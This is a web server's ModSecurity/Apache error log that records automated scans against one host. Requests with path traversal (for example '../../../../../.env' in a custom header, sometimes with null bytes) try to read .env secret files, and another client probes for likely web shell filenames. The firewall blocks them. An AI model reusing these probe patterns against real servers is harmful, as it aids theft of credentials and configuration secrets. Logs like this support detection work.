[Tue May 12 05:22:33.069651 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.238:60952] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc-faAnTZtx1_H_wy1VQAAAUU"]
[Tue May 12 05:22:33.125309 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc19r1yOh9TvizezidcQAAAEs"]
[Tue May 12 05:22:33.137569 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc181tk6y7yBJLpJo37gAAAIQ"]
[Tue May 12 05:22:33.214038 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/ws85.php
[Tue May 12 05:22:34.460708 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/ws88.php
[Tue May 12 05:22:34.558322 2026] [security2:error] [pid 1820198:tid 1820216] [client 45.148.10.238:60812] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/public/.env"] [unique_id "agKc-s1tk6y7yBJLpJo4HwAAAJA"]
[Tue May 12 05:22:34.558531 2026] [security2:error] [pid 1820198:tid 1820216] [client 45.148.10.238:60812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/public/.env"] [unique_id "agKc-s1tk6y7yBJLpJo4HwAAAJA"]
[Tue May 12 05:22:35.559000 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/wp-blogs.php
[Tue May 12 05:22:36.460728 2026] [core:error] [pid 1825287:tid 1825322] [client 45.148.10.238:60822] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 05:22:36.467571 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.467624 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.467654 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.467841 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.467918 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.467958 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.468328 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:36.744627 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/ws78.php
[Tue May 12 05:22:37.714351 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.238:60842] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKc_Rs7kySIUZ3ORnIksAAAAQ0"]
[Tue May 12 05:22:37.714554 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.238:60842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKc_Rs7kySIUZ3ORnIksAAAAQ0"]
[Tue May 12 05:22:37.797265 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/wp-content/radio.php
[Tue May 12 05:22:38.998152 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.238:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2dr1yOh9TvizezideAAAAEY"]
[Tue May 12 05:22:39.019558 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:39.031415 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.238:29638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc3c1tk6y7yBJLpJo39gAAAIk"]
[Tue May 12 05:22:40.842181 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.842238 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.842270 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.842499 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.842559 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.842593 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.843008 2026] [security2:error] [pid 1825179:tid 1825221] [client 45.148.10.238:60856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdANr1yOh9TvizezidqAAAAFc"]
[Tue May 12 05:22:40.846828 2026] [core:error] [pid 1844863:tid 1844878] [client 45.148.10.238:60868] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 05:22:40.859328 2026] [security2:error] [pid 1825287:tid 1825308] [client 45.148.10.238:60886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/www/.env"] [unique_id "agKdAAgpmE1yW0glLdgsVwAAAMM"]
[Tue May 12 05:22:40.859554 2026] [security2:error] [pid 1825287:tid 1825308] [client 45.148.10.238:60886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/www/.env"] [unique_id "agKdAAgpmE1yW0glLdgsVwAAAMM"]
[Tue May 12 05:22:40.866325 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:54346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2QgpmE1yW0glLdgsMgAAANg"]
[Tue May 12 05:22:40.976958 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:54276] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2QgpmE1yW0glLdgsMwAAAMQ"]
[Tue May 12 05:22:41.768918 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:42.513829 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.238:29746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc4M1tk6y7yBJLpJo3-QAAAI0"]
[Tue May 12 05:22:43.044008 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.238:54092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1xs7kySIUZ3ORnIkbwAAARQ"]
[Tue May 12 05:22:44.083149 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.083219 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.083256 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.083460 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.083511 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
